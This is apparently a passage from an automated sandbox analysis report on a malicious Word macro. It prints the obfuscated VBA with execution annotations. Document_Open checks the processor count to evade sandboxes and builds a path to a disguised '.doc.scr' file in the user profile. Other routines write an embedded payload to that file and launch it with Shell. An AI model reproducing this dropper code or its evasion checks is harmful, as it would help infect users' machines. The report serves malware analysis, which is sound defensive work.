                    SpFgy(22) = 68

                    229

                    Dim Cdqbn as String

                    230

                    Cdqbn = L4k6Z

                    L4k6Z

                    231

                    Dim H0XK7 as String

                    232

                    H0XK7 = AJQF4

                    AJQF4

                    233

                    Dim M7Bio(22 To 27) as String

                    234

                    M7Bio(22) = DQZ20

                    DQZ20

                    235

                    Dim HXSQn(31 To 147) as String

                    236

                    HXSQn(31) = Ft8Bk

                    Ft8Bk

                    237

                    Dim U5HU6(30 To 303) as String

                    238

                    U5HU6(30) = "YK22i"

                    239

                    Dim Y7pvu as Byte

                    240

                    Dim Cj68m(91) as Byte

                    241

                    Cj68m(91) = 191

                    242

                    ZQcI5 = 62792

                    243

                    For V3a1w = 62792 To UBound(FW5Vg)

                    UBound

                    244

                    Qq73S = Eb3be

                    Eb3be

                    245

                    MmLPO = SYbzA

                    SYbzA

                    246

                    FFBfg = B4bP1

                    B4bP1

                    247

                    ADOq8 = 132

                    248

                    J302e = I2sZr

                    I2sZr

                    249

                    Z48wG = VvZ0F

                    VvZ0F

                    250

                    Gu8Xe(V3a1w - 62792) = FW5Vg(V3a1w)

                    251

                    C14e5 = QKBEp

                    QKBEp

                    252

                    V30b8 = RdHtR

                    RdHtR

                    253

                    Next

                    UBound

                    254

                    Dim DkEHg(34 To 166) as Long

                    255

                    DkEHg(34) = (- 189 / 422) + 28

                    256

                    Dim YapM0(14 To 40) as Long

                    257

                    YapM0(14) = (- 28 / 364) / 42

                    258

                    Dim TkHQU(32 To 420) as String

                    259

                    TkHQU(32) = "XuidR"

                    260

                    Dim J74kH(2 To 21) as Long

                    261

                    J74kH(2) = (- 575 / 154) - 2

                    262

                    Dim QRDfP(21 To 171) as Long

                    263

                    QRDfP(21) = (- 754 / 673) - 5

                    264

                    Dim T368b(19) as Byte

                    265

                    T368b(19) = 27

                    266

                    Gu8Xe(ADOq8) = Ez2bF

                    267

                    Dim WF687 as String

                    268

                    WF687 = X5D63

                    X5D63

                    269

                    Dim NxyRH as Byte

                    270

                    NxyRH = 74

                    271

                    Dim RLxl1 as String

                    272

                    RLxl1 = "X6wh0"

                    273

                    Open Oj62U For Binary As # 6

                    Open("C:\Users\luketaylor\text.doc.16147.scr")

                    executed
                    274

                    Dim Z87Cn(90) as Byte

                    275

                    Z87Cn(90) = 82

                    276

                    Put # 6, , Gu8Xe

                    277

                    Dim NEX75(11 To 150) as String

                    278

                    NEX75(11) = "EHw60"

                    279

                    Dim Mu7id(24 To 263) as String

                    280

                    Mu7id(24) = ZdOQk

                    ZdOQk

                    281

                    Dim TxsAb(7 To 37) as Long

                    282

                    TxsAb(7) = (- 258 + 208) / 4

                    283

                    Dim S8bLT as Byte

                    284

                    S8bLT = 253

                    285

                    Dim Crs4A(18 To 228) as Long

                    286

                    Crs4A(18) = (535 + 57) - 12

                    287

                    Dim FzI6j(8) as Byte

                    288

                    FzI6j(8) = 244

                    289

                    Dim IAJgk as String

                    290

                    IAJgk = "M88Xk"

                    291

                    Dim QQ3P0 as String

                    292

                    QQ3P0 = DW7qw

                    DW7qw

                    293

                    Dim Rquv5 as Long

                    294

                    Rquv5 = (677 + 286) - 48

                    295

                    Dim S6p26 as String

                    296

                    S6p26 = AC4wm

                    AC4wm

                    297

                    Dim OpjqX(25) as Byte

                    298

                    OpjqX(25) = 77

                    299

                    Dim O66TD as String

                    300

                    O66TD = SkX5n

                    SkX5n

                    301

                    Close # 6

                    302

                    Dim WpIoU(14 To 265) as Long

                    303

                    WpIoU(14) = (- 869 - 90) + 2

                    304

                    Dim MkkVn(38) as Byte

                    305

                    MkkVn(38) = 28

                    306

                    Dim Pa3K2(25 To 233) as Long

                    307

                    Pa3K2(25) = (- 434 + 189) - 32

                    308

                    Dim K7iv6(21 To 490) as String

                    309

                    K7iv6(21) = K6Lww

                    K6Lww

                    310

                    Dim NUIv4(7 To 14) as Long

                    311

                    NUIv4(7) = (576 - 62) / 34

                    312

                    Dim AbK61 as Byte

                    313

                    Dim WV2q6(21 To 281) as Long

                    314

                    WV2q6(21) = (- 641 + 415) + 20

                    315

                    Dim O0302(8 To 390) as String

                    316

                    O0302(8) = J7ie0

                    J7ie0

                    317

                    Dim Q88WO as Long

                    318

                    Q88WO = (- 652 + 702) + 43

                    319

                    Dim QH5Gc as String

                    320

                    QH5Gc = "LMP6t"

                    321

                    Dim URwC7 as Long

                    322

                    URwC7 = (- 974 - 272) + 25

                    323

                    Dim GZUB0 as Byte

                    324

                    Dim T5F8J as String

                    325

                    T5F8J = Ic1Eh

                    Ic1Eh

                    326

                    Dim H7U0t as Byte

                    327

                    H7U0t = 185

                    328

                    Dim E01G7 as Byte

                    329

                    End With

                    330

                    Dim M4G2b(37) as Byte

                    331

                    M4G2b(37) = 21

                    332

                    Dim Hmja5(16 To 115) as Long

                    333

                    Hmja5(16) = (604 + 348) - 23

                    334

                    Dim Yq4b6 as String

                    335

                    Yq4b6 = "PA7En"

                    336

                    Dim Lrxr4 as Long

                    337

                    Lrxr4 = (- 948 / 663) / 1

                    338

                    Dim A3kNR as Long

                    339

                    A3kNR = (- 405 / 871) - 34

                    340

                    Dim L6X4W(29) as Byte

                    341

                    L6X4W(29) = 246

                    342

                    Dim H4vCl as Byte

                    343

                    Dim SnR7P as Long

                    344

                    SnR7P = (883 - 960) / 32

                    345

                    Dim EA77f as Byte

                    346

                    Dim Ba0su(25 To 216) as Long

                    347

                    Ba0su(25) = (645 - 996) / 7

                    348

                    Dim GRZ8p(17 To 42) as String

                    349

                    GRZ8p(17) = DEOo8

                    DEOo8

                    350

                    Dim G50D0 as Long

                    351

                    G50D0 = (414 + 157) - 3

                    352

                    Dim E1p3y as String

                    353

                    E1p3y = M0huq

                    M0huq

                    354

                    Dim Q80xi as String

                    355

                    Q80xi = E40L2

                    E40L2

                    356

                    Dim BvUd1(9 To 133) as Long

                    357

                    BvUd1(9) = (- 959 + 284) / 9

                    358

                    Dim O85R8 as Long

                    359

                    O85R8 = (314 - 759) - 2

                    360

                    Dim Atdh3 as Byte

                    361

                    Atdh3 = 0

                    362

                    Dim E4yc5 as Long

                    363

                    E4yc5 = (- 166 / 740) - 48

                    364

                    Dim I8KSQ(12 To 17) as String

                    365

                    I8KSQ(12) = "JmTzx"

                    366

                    Dim IR4K2 as Long

                    367

                    IR4K2 = (- 658 + 63) - 19

                    368

                    Dim PfM2W as Byte

                    369

                    PfM2W = 160

                    370

                    Dim Z0ejl as Long

                    371

                    Z0ejl = (- 733 - 497) - 46

                    372

                    Dim D306l as String

                    373

                    D306l = DBJaS

                    DBJaS

                    374

                    Dim PDT56(97) as Byte

                    375

                    PDT56(97) = 231

                    376

                    Dim EdbfP as Byte

                    377

                    EdbfP = 74

                    378

                    Dim C5yy5(28) as Byte

                    379

                    C5yy5(28) = 161

                    380

                    Dim GcRAS as Byte

                    381

                    Dim OI0H3 as String

                    382

                    OI0H3 = Hf724

                    Hf724

                    383

                    Dim WBD52(20 To 47) as String

                    384

                    WBD52(20) = LGvtQ

                    LGvtQ

                    385

                    Dim X3k4t(4 To 447) as String

                    386

                    X3k4t(4) = "Zo6UE"

                    387

                    Dim Q2Q4P as Long

                    388

                    Q2Q4P = (823 - 402) + 5

                    389

                    Dim E03Yb(20 To 27) as Long

                    390

                    E03Yb(20) = (- 275 + 970) + 27

                    391

                    Dim A1P3f(11 To 100) as String

                    392

                    A1P3f(11) = OkaWA

                    OkaWA

                    393

                    Dim UHd6q(1) as Byte

                    394

                    UHd6q(1) = 183

                    395

                    Dim XDTN8(28 To 36) as String

                    396

                    XDTN8(28) = JrPYW

                    JrPYW

                    397

                    Dim PueOR as Byte

                    398

                    PueOR = 176

                    399

                    Dim E52jB(31 To 232) as String

                    400

                    E52jB(31) = F6kH3

                    F6kH3

                    401

                    Dim PR1Kt as Long

                    402

                    PR1Kt = (667 - 260) - 22

                    403

                    Dim McG7w as Byte

                    404

                    Dim IuY2U(25) as Byte

                    405

                    IuY2U(25) = 90

                    406

                    Dim A8XHS(9 To 62) as String

                    407

                    A8XHS(9) = Hf7hK

                    Hf7hK

                    408

                    Dim D5NeH as Long

                    409

                    D5NeH = (- 480 / 928) + 8

                    410

                    Dim Z0C28 as Byte

                    411

                    Z0C28 = 121

                    412

                    Dim DzJf7 as Long

                    413

                    DzJf7 = (215 + 99) / 4

                    414

                    Dim IM6UA(2 To 268) as Long

                    415

                    IM6UA(2) = (- 397 / 517) / 17

                    416

                    Dim TJ2Ep as String

                    417

                    TJ2Ep = "OvD2n"

                    418

                    Dim SJnW2 as String

                    419

                    SJnW2 = "BNFSv"

                    420

                    Dim HEffn(95) as Byte

                    421

                    HEffn(95) = 174

                    422

                    Dim Tv8vb as Byte

                    423

                    Dim JQNt7 as Long

                    424

                    JQNt7 = (147 / 453) + 27

                    425

                    Dim K3GL0(23 To 255) as Long

                    426

                    K3GL0(23) = (887 - 65) + 43

                    427

                    Dim CL270(33 To 308) as String

                    428

                    CL270(33) = "OJ4L1"

                    429

                    Dim WL7v3(1 To 73) as Long

                    430

                    WL7v3(1) = (209 - 283) - 16

                    431

                    Dim Q5AZ7(9 To 473) as Long

                    432

                    Q5AZ7(9) = (- 166 / 532) + 41

                    433

                    Dim CE6wW as String

                    434

                    CE6wW = "Vs33Z"

                    435

                    Dim DPxT7 as Byte

                    436

                    Dim DSDr0(49) as Byte

                    437

                    DSDr0(49) = 191

                    438

                    Dim Q0MEh(55) as Byte

                    439

                    Q0MEh(55) = 82

                    440

                    Dim Qe281(74) as Byte

                    441

                    Qe281(74) = 74

                    442

                    Dim Ayi03 as Byte

                    443

                    Dim SLS3C as Long

                    444

                    SLS3C = (977 - 967) / 7

                    445

                    Dim C4pL6(0 To 1) as String

                    446

                    C4pL6(0) = "JqSOJ"

                    447

                    End Sub

                    Subroutine sh1, APIs: 10, Strings: 5, Number of lines: 97, Relevance: 28.097
                    APIsMeta Information

                    DQRn4

                    ZQ451

                    ME4k5

                    VAhvE

                    MeKE6

                    Mav4d

                    Iz1S7

                    ZQ3QJ

                    Shell

                    		Shell("C:\Users\luketaylor\text.doc.16147.scr") -> 3300

                    Igu02

                    StringsDecrypted Strings
                    "LYC2N"
                    "BqdZA"
                    "C4dm6"
                    "Ig7uA"
                    "PRe2L"
                    LineInstructionMeta Information
                    448

                    Public Sub sh1(KAJuJ)

                    449

                    Dim STI26 as Byte

                    executed
                    450

                    Dim A0xHM(26 To 369) as String

                    451

                    A0xHM(26) = DQRn4

                    DQRn4

                    452

                    Dim Q1sr5 as String

                    453

                    Q1sr5 = ZQ451

                    ZQ451

                    454

                    Dim Y3smw(20 To 313) as Long

                    455

                    Y3smw(20) = (138 + 109) - 48

                    456

                    Dim I3yT0 as String

                    457

                    I3yT0 = ME4k5

                    ME4k5

                    458

                    Dim LjSQB as String

                    459

                    LjSQB = VAhvE

                    VAhvE

                    460

                    Dim A4zLH as Byte

                    461

                    A4zLH = 0

                    462

                    Dim TsQ3h as Byte

                    463

                    Dim CoanH as Byte

                    464

                    CoanH = 221

                    465

                    Dim I1V6d as Long

                    466

                    I1V6d = (137 / 362) - 19

                    467

                    Dim L07b0(3 To 329) as Long

                    468

                    L07b0(3) = (- 288 - 699) / 32

                    469

                    Dim LHC85 as String

                    470

                    LHC85 = "LYC2N"

                    471

                    Dim VQDRI as String

                    472

                    VQDRI = MeKE6

                    MeKE6

                    473

                    Dim T5PPC as Byte

                    474

                    Dim U2B0a(9 To 186) as Long

                    475

                    U2B0a(9) = (- 955 + 123) - 14

                    476

                    Dim XCgdc as Byte

                    477

                    Dim Zt0dT as Byte

                    478

                    Dim PLg3l(48) as Byte

                    479

                    PLg3l(48) = 13

                    480

                    Dim RpE5C as Byte

                    481

                    Dim WmXR7 as String

                    482

                    WmXR7 = Mav4d

                    Mav4d

                    483

                    Dim JCCHw as String

                    484

                    JCCHw = "BqdZA"

                    485

                    Dim I78AF as Byte

                    486

                    Dim LE5S0(84) as Byte

                    487

                    LE5S0(84) = 227

                    488

                    Dim YNSD0 as String

                    489

                    YNSD0 = "C4dm6"

                    490

                    Dim BRt8w(14 To 447) as Long

                    491

                    BRt8w(14) = (- 410 - 969) - 47

                    492

                    Dim J6FpP(96) as Byte

                    493

                    J6FpP(96) = 30

                    494

                    Dim KjvOJ(98) as Byte

                    495

                    KjvOJ(98) = 143

                    496

                    Dim XbFDT(12) as Byte

                    497

                    XbFDT(12) = 91

                    498

                    Dim PJUqj as Byte

                    499

                    Dim G3Gzt(5 To 45) as Long

                    500

                    G3Gzt(5) = (728 / 168) + 5

                    501

                    Dim DB0b8(2 To 141) as Long

                    502

                    DB0b8(2) = (- 96 + 875) + 49

                    503

                    Dim Rq3H3 as Long

                    504

                    Rq3H3 = (- 705 - 628) - 47

                    505

                    Dim Ew4iZ as Long

                    506

                    Ew4iZ = (789 - 851) + 44

                    507

                    Dim MUF8J(97) as Byte

                    508

                    MUF8J(97) = 164

                    509

                    Dim Y3uBE(23 To 476) as Long

                    510

                    Y3uBE(23) = (- 145 + 749) / 8

                    511

                    Dim Mz6eO as Long

                    512

                    Mz6eO = (859 / 602) + 7

                    513

                    Dim G35S1 as Byte

                    514

                    Dim O2gTH(0) as Byte

                    515

                    O2gTH(0) = 148

                    516

                    Dim D4H7v as Byte

                    517

                    D4H7v = 80

                    518

                    Dim S0lpP as String

                    519

                    S0lpP = Iz1S7

                    Iz1S7

                    520

                    Dim J886S as Byte

                    521

                    Dim GB7LY as Long

                    522

                    GB7LY = (237 + 801) - 27

                    523

                    Dim PkcLo as String

                    524

                    PkcLo = ZQ3QJ

                    ZQ3QJ

                    525

                    Dim K0633 as Byte

                    526

                    Dim J5j4c(7 To 91) as String

                    527

                    J5j4c(7) = "Ig7uA"

                    528

                    Dim HdY8v as Long

                    529

                    HdY8v = (154 - 193) - 20

                    530

                    Dim J61Ot as Byte

                    531

                    Dim J2HgG(30 To 488) as String

                    532

                    J2HgG(30) = "PRe2L"

                    533

                    Dim NRd6k as Long

                    534

                    NRd6k = (294 / 34) + 48

                    535

                    Shell KAJuJ

                    Shell("C:\Users\luketaylor\text.doc.16147.scr") -> 3300

                    executed
                    536

                    Dim WE8cz(1 To 363) as Long

                    537

                    WE8cz(1) = (545 + 700) / 25

                    538

                    Dim Lptm3 as Byte

                    539

                    Lptm3 = 26

                    540

                    Dim Eb7fK as String

                    541

                    Eb7fK = Igu02

                    Igu02

                    542

                    Dim ZA7Yw(16 To 306) as Long

                    543

                    ZA7Yw(16) = (- 27 + 139) - 18

                    544

                    End Sub

                    Module: Module1

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Module1"

                    Module: ThisDocument

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "ThisDocument"

                    2

                    Attribute VB_Base = "1Normal.ThisDocument"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = True

                    8

                    Attribute VB_Customizable = True

                    Executed Functions
                    Subroutine Document_Open, APIs: 29, Strings: 4, Number of lines: 46, Relevance: 72.046
                    APIsMeta Information

                    T8F4v

                    K5D8g

                    Ul5qZ

                    S28K3

                    Environ

                    		Environ("NUMBER_OF_PROCESSORS") -> 4

                    O84BAz6

                    J41vmf7

                    We8mB50

                    Vx1bX0T

                    KL0RGx1

                    Xa3i2R0

                    Zy6VpOn

                    BJ05P

                    P42zB

                    Q27gI

                    Part of subcall function x@J04Xt: Ik728

                    Part of subcall function x@J04Xt: A014z

                    Part of subcall function x@J04Xt: UrERz

                    Part of subcall function x@J04Xt: YcIPR

                    Part of subcall function x@J04Xt: MRbO5

                    Part of subcall function x@J04Xt: CStr

                    Part of subcall function x@J04Xt: NIuZE

                    Part of subcall function x@J04Xt: EP2DB

                    Part of subcall function x@J04Xt: ZvDa2

                    Part of subcall function x@J04Xt: G0d64

                    Part of subcall function x@J04Xt: W362Y

                    Part of subcall function x@J04Xt: GjaAA

                    CStr

                    Environ

                    		Environ("USERPROFILE") -> C:\Users\luketaylor
                    StringsDecrypted Strings
                    "NUMB""E"
                    "Z265E"
                    "WE3yt"
                    "USERPROFILE"
                    LineInstructionMeta Information
                    652

                    Sub Document_Open()

                    653

                    Dim UlBiv as String

                    executed
                    654

                    UlBiv = T8F4v

                    T8F4v

                    655

                    Dim MQ7hW(29 To 194) as String

                    656

                    MQ7hW(29) = K5D8g

                    K5D8g

                    657

                    Dim QPyeV as String

                    658

                    QPyeV = Ul5qZ

                    Ul5qZ

                    659

                    Dim F63XK as String

                    660

                    F63XK = S28K3

                    S28K3

                    661

                    Dim Fy83h(26 To 265) as Long

                    662

                    Fy83h(26) = (- 385 - 366) - 24

                    663

                    Dim C7kr8 as Long

                    664

                    C7kr8 = (12 - 60) + 6

                    665

                    On Error Resume Next

                    666

                    If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then

                    Environ("NUMBER_OF_PROCESSORS") -> 4

                    O84BAz6

                    J41vmf7

                    We8mB50

                    Vx1bX0T

                    KL0RGx1

                    Xa3i2R0

                    Zy6VpOn

                    executed
                    666

                    Goto B0476

                    666

                    Endif

                    667

                    Dim D6q0Q(25 To 133) as Long

                    668

                    D6q0Q(25) = (- 956 / 332) + 41

                    669

                    Dim JJzIB as Long

                    670

                    JJzIB = (- 213 + 168) / 38

                    671

                    Dim OMLpT as Long

                    672

                    OMLpT = (574 / 575) / 44

                    673

                    Dim KRfkL as String

                    674

                    KRfkL = "Z265E"

                    675

                    Dim W8NN6 as String

                    676

                    W8NN6 = BJ05P

                    BJ05P

                    677

                    Dim ZOC5l as Long

                    678

                    ZOC5l = (- 453 + 969) / 17

                    679

                    Dim VIfVd(23 To 219) as String

                    680

                    VIfVd(23) = P42zB

                    P42zB

                    681

                    Dim JinL2 as Byte

                    682

                    Dim G2c48 as String

                    683

                    G2c48 = "WE3yt"

                    684

                    Dim VZLVx as Byte

                    685

                    VZLVx = 165

                    686

                    Dim M17C2(25 To 322) as String

                    687

                    M17C2(25) = Q27gI

                    Q27gI

                    688

                    Dim FPN8c as Long

                    689

                    FPN8c = (236 / 794) - 26

                    690

                    x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"

                    CStr

                    Environ("USERPROFILE") -> C:\Users\luketaylor

                    executed
                    691

                    Dim Xw24M as Byte

                    692

                    Xw24M = 254

                    693

                    Dim PqAkQ as Byte

                    693

                    B0476:

                    695

                    End Sub

                    Non-Executed Functions
                    Subroutine test1, APIs: 55, Strings: 47, Number of lines: 551, Relevance: 153.551
                    APIsMeta Information

                    JiIyy

                    I70P3

                    HZibc

                    BcLv2

                    C0Vfq

                    BxYtT

                    OhAx1

                    NzkP8

                    Eg1q6

                    F2gVH

                    LKbGd

                    G1jcm

                    GE8D2

                    CySUV

                    W8fJH

                    D18NP

                    RzEI8

                    FG8Ql

                    Us6o1

                    Z2VyP

                    CFq3n

                    UDtTh

                    D6zNx

                    NGKGP

                    Y2Jti

                    GLr0d

                    MvykX

                    JS08j

                    N6b2y

                    Ace62

                    A7h7X

                    US5tA

                    R0be7

                    UBound

                    UBound

                    A7fA2

                    Pt7t4

                    O5Fw8

                    K83vS

                    Nzfy5

                    XBsOm

                    LBzBN

                    Bpcx3

                    B2864

                    B3Q2l

                    A35Ls

                    N578T

                    Open

                    U3038

                    Y0SFj

                    EqDjd

                    J6Xnm

                    Gn0p5

                    X6RIx

                    TyTNz

                    StringsDecrypted Strings
                    "RNvYF"
                    "Dv1Sx"
                    "YH3V8"
                    "VW6JF"
                    "Qh343"
                    "HOqcN"
                    "MFxd6"
                    "FXzug"
                    "RVvYR"
                    "DyjxX"
                    "MaI72"
                    "D1cCH"
                    "SvjJX"
                    "Oj3p5"
                    "F0B2X"
                    "U5H2Z"
                    "GN253"
                    "UE1iu"
                    "IqK88"
                    "HfFAf"
                    "MiHQ1"
                    "In832"
                    "RUtlW"
                    "SxTq1"
                    "KQaR1"
                    "S1B2c"
                    "EQoob"
                    "HIdCG"
                    "N7HO2"
                    "Jg4kN"
                    "Um027"
                    "IAqLs"
                    "JhH55"
                    "J052Y"
                    "VAZ1L"
                    "OSb7k"
                    "MJId0"
                    "FPLi6"
                    "DX0mh"
                    "U0xEV"
                    "S6WCJ"
                    "R21L5"
                    "PGn02"
                    "V20A1"
                    "CtDSH"
                    "Qgym7"
                    "Gt7oe"
                    LineInstructionMeta Information
                    9

                    Public Sub test1(SG07j, B78Bz)

                    10

                    Dim Z6Vtd(2 To 270) as Long

                    11

                    Z6Vtd(2) = (- 921 / 17) + 27

                    12

                    Dim XxCry(21 To 252) as String

                    13

                    XxCry(21) = "RNvYF"

                    14

                    Dim L16Ns as Long

                    15

                    L16Ns = (513 / 647) / 21

                    16

                    Dim T3o6C(29 To 50) as String

                    17

                    T3o6C(29) = JiIyy

                    JiIyy

                    18

                    Dim WPY5a as String

                    19

                    WPY5a = I70P3

                    I70P3

                    20

                    Dim T6DRG(68) as Byte

                    21

                    T6DRG(68) = 167

                    22

                    Dim FY4tj as String

                    23

                    FY4tj = "Dv1Sx"

                    24

                    Dim JySvd(5 To 441) as Long

                    25

                    JySvd(5) = (622 - 749) / 16

                    26

                    Dim HVgMV(40) as Byte

                    27

                    HVgMV(40) = 173

                    28

                    Dim Dlv68(15 To 195) as String

                    29

                    Dlv68(15) = "YH3V8"

                    30

                    Dim NAnEu as Long

                    31

                    NAnEu = (928 + 537) - 5

                    32

                    Dim Uq8X3 as Byte

                    33

                    Uq8X3 = 213

                    34

                    Dim AH5LQ(15 To 88) as String

                    35

                    AH5LQ(15) = HZibc

                    HZibc

                    36

                    Dim Hj50H(11 To 422) as Long

                    37

                    Hj50H(11) = (- 40 / 551) - 42

                    38

                    Dim MYcw1(20 To 237) as String

                    39

                    MYcw1(20) = BcLv2

                    BcLv2

                    40

                    Dim BP33O(3 To 416) as String

                    41

                    BP33O(3) = "VW6JF"

                    42

                    Dim N18dI as Byte

                    43

                    N18dI = 106

                    44

                    Dim YrDH8 as Long

                    45

                    YrDH8 = (- 855 + 784) + 44

                    46

                    Dim OQhFY as Byte

                    47

                    Dim BO00p as String

                    48

                    BO00p = "Qh343"

                    49

                    Dim WDJUU(6 To 221) as String

                    50

                    WDJUU(6) = "HOqcN"

                    51

                    Dim KG8wK(34 To 115) as String

                    52

                    KG8wK(34) = "MFxd6"

                    53

                    Dim ZIGAQ as Long

                    54

                    ZIGAQ = (- 962 / 370) - 2

                    55

                    Dim YfY6A as String

                    56

                    YfY6A = "FXzug"

                    57

                    Dim I265X as Long

                    58

                    I265X = (- 478 - 33) - 23

                    59

                    Dim J0G42 as String

                    60

                    J0G42 = C0Vfq

                    C0Vfq

                    61

                    Dim O15AO as String

                    62

                    O15AO = BxYtT

                    BxYtT

                    63

                    Dim F5Yo4 as Byte

                    64

                    Dim DKNai as String

                    65

                    DKNai = OhAx1

                    OhAx1

                    66

                    Dim SJAPn as Long

                    67

                    SJAPn = (830 + 762) / 20

                    68

                    Dim ZU5MU(27) as Byte

                    69

                    ZU5MU(27) = 233

                    70

                    Dim Dvhoi as Long

                    71

                    Dvhoi = (576 - 590) / 15

                    72

                    Dim Iu0ef(10 To 101) as String

                    73

                    Iu0ef(10) = NzkP8

                    NzkP8

                    74

                    Dim Ayt2P as String

                    75

                    Ayt2P = "RVvYR"

                    76

                    Dim HNP0B(30 To 296) as Long

                    77

                    HNP0B(30) = (432 / 20) + 14

                    78

                    Dim DGhXX(9 To 17) as Long

                    79

                    DGhXX(9) = (644 + 448) + 14

                    80

                    Dim Ghtv5 as Long

                    81

                    Ghtv5 = (- 356 - 236) / 34

                    82

                    Dim EZgIt(14 To 475) as String

                    83

                    EZgIt(14) = Eg1q6

                    Eg1q6

                    84

                    Dim K17RU(9 To 380) as Long

                    85

                    K17RU(9) = (- 316 / 906) + 7

                    86

                    Dim B205R as String

                    87

                    B205R = F2gVH

                    F2gVH

                    88

                    Dim XM7np(29 To 194) as String

                    89

                    XM7np(29) = LKbGd

                    LKbGd

                    90

                    Dim JEh0y(0 To 1) as String

                    91

                    JEh0y(0) = G1jcm

                    G1jcm

                    92

                    Dim J5wcd as String

                    93

                    J5wcd = "DyjxX"

                    94

                    Dim NcEED(16 To 206) as Long

                    95

                    NcEED(16) = (724 - 146) + 40

                    96

                    Dim PddFF(76) as Byte

                    97

                    PddFF(76) = 185

                    98

                    Dim Z7v0Q as String

                    99

                    Z7v0Q = GE8D2

                    GE8D2

                    100

                    Dim PG21j as String

                    101

                    PG21j = CySUV

                    CySUV

                    102

                    Dim ZLXC1 as Byte

                    103

                    Dim T0G6r(7 To 356) as String

                    104

                    T0G6r(7) = "MaI72"

                    105

                    Dim CF1sh(88) as Byte

                    106

                    CF1sh(88) = 12

                    107

                    Dim M4BLO(4 To 28) as Long

                    108

                    M4BLO(4) = (359 - 415) + 44

                    109

                    Dim Fw3vH as Long

                    110

                    Fw3vH = (247 + 589) + 41

                    111

                    Dim RTkJ0() as Byte

                    112

                    Dim It8ni as Long

                    113

                    It8ni = (- 302 + 50) / 39

                    114

                    Dim GM1v5 as Long

                    115

                    GM1v5 = (972 + 796) - 26

                    116

                    Dim CEWgw(28 To 303) as String

                    117

                    CEWgw(28) = "D1cCH"

                    118

                    Dim Pvtdr as String

                    119

                    Pvtdr = W8fJH

                    W8fJH

                    120

                    Dim DE05S as String

                    121

                    DE05S = "SvjJX"

                    122

                    Dim DypKj(11 To 126) as Long

                    123

                    DypKj(11) = (- 480 + 784) / 22

                    124

                    Dim A0ylA as Byte

                    125

                    Dim LH7Q1 as Long

                    126

                    LH7Q1 = (- 724 - 128) - 11

                    127

                    Dim V7YP1 as Byte

                    128

                    Dim Gb6x8 as Long

                    129

                    Gb6x8 = (297 - 57) - 10

                    130

                    Dim AzPD7(49) as Byte

                    131

                    AzPD7(49) = 60

                    132

                    Dim A8MDS(2 To 139) as Long

                    133

                    A8MDS(2) = (659 - 324) + 15

                    134

                    Dim T4MG4 as String

                    135

                    T4MG4 = D18NP

                    D18NP

                    136

                    Dim TFsn8(62) as Byte

                    137

                    TFsn8(62) = 76

                    138

                    Dim IVYW5(30 To 85) as String

                    139

                    IVYW5(30) = RzEI8

                    RzEI8

                    140

                    Dim NJWek as String

                    141

                    NJWek = "Oj3p5"

                    142

                    Dim UfYzs(55) as Byte

                    143

                    UfYzs(55) = 132

                    144

                    Dim MwE07(7) as Byte

                    145

                    MwE07(7) = 201

                    146

                    Dim Nr0bV as Byte

                    147

                    Dim CkcpF(99) as Byte

                    148

                    CkcpF(99) = 239

                    149

                    Dim EZ3r3(32 To 170) as Long

                    150

                    EZ3r3(32) = (162 + 950) + 25

                    151

                    Dim T1GVo as Byte

                    152

                    T1GVo = 151

                    153

                    Dim T0ZTv as Byte

                    154

                    T0ZTv = 91

                    155

                    Dim AfOpe as Long

                    156

                    AfOpe = (373 - 274) + 37

                    157

                    Dim ZPG4y(30 To 450) as String

                    158

                    ZPG4y(30) = FG8Ql

                    FG8Ql

                    159

                    Dim Q8mqW as Byte

                    160

                    Dim Mlh44(28 To 169) as String

                    161

                    Mlh44(28) = "F0B2X"

                    162

                    Dim Sijqv as Byte

                    163

                    Sijqv = 170

                    164

                    Dim HS2f0(51) as Byte

                    165

                    HS2f0(51) = 238

                    166

                    Dim W8rbm as Byte

                    167

                    Dim XmCnj as String

                    168

                    XmCnj = Us6o1

                    Us6o1

                    169

                    Dim Sq28v as Byte

                    170

                    Sq28v = 89

                    171

                    Dim BnmDS as Long

                    172

                    BnmDS = (- 28 + 623) - 35

                    173

                    Dim EiyW4(25) as Byte

                    174

                    EiyW4(25) = 230

                    175

                    Dim UraR5(40) as Byte

                    176

                    UraR5(40) = 99

                    177

                    Dim PUR0v as Byte

                    178

                    Dim X0m11(20 To 78) as String

                    179

                    X0m11(20) = "U5H2Z"

                    180

                    With CreateObject("adodb.stream")

                    181

                    Dim BHzgp as Long

                    182

                    BHzgp = (774 - 578) - 37

                    183

                    Dim TXkcs(5 To 70) as Long

                    184

                    TXkcs(5) = (439 - 488) / 37

                    185

                    Dim QHGsD as Byte

                    186

                    Dim BX28o(98) as Byte

                    187

                    BX28o(98) = 72

                    188

                    Dim W8xkN as Byte

                    189

                    W8xkN = 5

                    190

                    Dim TxHCo as Byte

                    191

                    TxHCo = 151

                    192

                    Dim ENEpV(15 To 281) as Long

                    193

                    ENEpV(15) = (- 211 / 473) + 40

                    194

                    Dim A06q8 as String

                    195

                    A06q8 = "GN253"

                    196

                    Dim S248R as String

                    197

                    S248R = Z2VyP

                    Z2VyP

                    198

                    Dim LsvZ7(18 To 331) as Long

                    199

                    LsvZ7(18) = (558 / 278) - 28

                    200

                    Dim G27FB(1 To 443) as Long

                    201

                    G27FB(1) = (- 543 - 254) / 41

                    202

                    Dim Eug66(86) as Byte

                    203

                    Eug66(86) = 229

                    204

                    Dim Vb22q(90) as Byte

                    205

                    Vb22q(90) = 183

                    206

                    Dim XoaL7(14 To 275) as Long

                    207

                    XoaL7(14) = (159 - 453) + 33

                    208

                    Dim H1zFm(2 To 239) as String

                    209

                    H1zFm(2) = "UE1iu"

                    210

                    Dim Fg4l1(4 To 148) as String

                    211

                    Fg4l1(4) = "IqK88"

                    212

                    Dim GAF6F(28 To 166) as Long

                    213

                    GAF6F(28) = (- 521 - 694) - 18

                    214

                    Dim Won7L(90) as Byte

                    215

                    Won7L(90) = 92

                    216

                    Dim KotsD(14 To 90) as Long

                    217

                    KotsD(14) = (- 782 - 398) - 23

                    218

                    Dim Vdxb1(23 To 24) as Long

                    219

                    Vdxb1(23) = (590 / 885) + 41

                    220

